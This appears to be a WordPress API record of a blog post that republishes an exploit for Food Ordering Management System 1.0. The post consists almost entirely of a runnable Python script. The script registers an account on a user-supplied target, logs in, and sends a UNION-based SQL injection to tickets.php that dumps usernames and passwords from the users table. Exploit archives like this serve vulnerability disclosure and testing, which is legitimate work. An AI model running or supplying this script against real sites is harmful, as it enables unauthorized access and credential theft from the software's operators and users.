{"id":31151,"date":"2022-09-27T22:08:13","date_gmt":"2022-09-27T19:08:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168517\/foms10-sql.txt"},"modified":"2022-09-28T14:59:00","modified_gmt":"2022-09-28T11:29:00","slug":"food-ordering-management-system-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/food-ordering-management-system-1-0-sql-injection\/","title":{"rendered":"Food Ordering Management System 1.0 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Food Ordering Management System &#8211; SQL Injection<br \/>\n# Google Dork: N\/A<br \/>\n# Date: 2022-9-27<br \/>\n# Exploit Author: yousef alraddadi &#8211; https:\/\/twitter.com\/y0usef_11<br \/>\n# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15689\/food-ordering-management-system-php-and-mysql-free-source-code.html<br \/>\n# Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/foms.zip<br \/>\n# Tested on: windows 11 &#8211; XAMPP<br \/>\n# CVE : N\/A<br \/>\n# Version: 1.0<\/p>\n<p dir=\"ltr\">#\/usr\/bin\/python3<\/p>\n<p dir=\"ltr\">import requests<br \/>\nimport os<br \/>\nimport sys<br \/>\nimport time<br \/>\nimport random<br \/>\nfrom bs4 import BeautifulSoup<\/p>\n<p dir=\"ltr\"># clean screen<br \/>\nos.system(&#8220;cls&#8221;)<br \/>\nos.system(&#8220;clear&#8221;)<\/p>\n<p dir=\"ltr\">logo = &#8221;&#8217;<br \/>\n##################################################################<br \/>\n# #<br \/>\n# SQL injection (Food Ordering Management System) #<br \/>\n# #<br \/>\n##################################################################<br \/>\n&#8221;&#8217;<br \/>\nprint(logo)<\/p>\n<p dir=\"ltr\">url = str(input(&#8220;Enter website url =&gt; &#8220;))<br \/>\nusername = str(input(&#8220;Enter Username =&gt; : &#8220;))<br \/>\nname = (&#8220;test123456&#8221;)<br \/>\npassword = (&#8220;test123456&#8221;)<br \/>\nphone = (&#8220;4511233199&#8221;)<br \/>\nnumber = (&#8220;1234567891000000&#8221;)<br \/>\ncvv = (&#8220;444&#8221;)<\/p>\n<p dir=\"ltr\">req = requests.Session()<\/p>\n<p dir=\"ltr\">regsiter_page = (url+&#8221;\/foms\/routers\/register-router.php&#8221;)<br \/>\nregsiter = {&#8216;username&#8217;:username,&#8217;name&#8217;:name,&#8217;password&#8217;:password,&#8217;phone&#8217;:phone,&#8217;number&#8217;:number,&#8217;cvv&#8217;:cvv}<br \/>\nreq_regsiter = req.post(regsiter_page,data=regsiter)<br \/>\nprint(&#8220;[+] Regsiter Successfully&#8221;)<\/p>\n<p dir=\"ltr\">login = {&#8216;username&#8217;:username,&#8217;password&#8217;:password}<br \/>\nlogin_page = (url+&#8221;\/foms\/routers\/router.php&#8221;)<br \/>\nreq_login = req.post(login_page,data=login)<br \/>\nprint(&#8220;[+] Login Successfully&#8221;)<\/p>\n<p dir=\"ltr\">sql = req.get(url+&#8221;\/foms\/tickets.php?status=Open&#8217; union select 1,2,username,4,password,6,7,8 from users&#8211; -&#8220;)<br \/>\ntext = sql.text<br \/>\nsoup = BeautifulSoup(text,&#8221;html.parser&#8221;)<\/p>\n<p dir=\"ltr\">print(&#8220;[+] SQL Injction Get Users and Password from table Users&#8221;)<br \/>\nfor link in soup.findAll(True, {&#8216;class&#8217;:[&#8216;task-cat light-blue&#8217;, &#8216;collections-title&#8217;]}):<br \/>\ntime.sleep(0.2)<br \/>\nprint(link.get)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Food Ordering Management System &#8211; SQL Injection # Google Dork: N\/A # Date: 2022-9-27 # Exploit Author: yousef alraddadi &#8211; https:\/\/twitter.com\/y0usef_11 # Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15689\/food-ordering-management-system-php-and-mysql-free-source-code.html # Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/foms.zip # Tested on: windows 11 &#8211; XAMPP # CVE : N\/A # Version: 1.0 #\/usr\/bin\/python3 import requests import os import sys import time &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31151","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31151","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31151"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31151\/revisions"}],"predecessor-version":[{"id":31172,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31151\/revisions\/31172"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}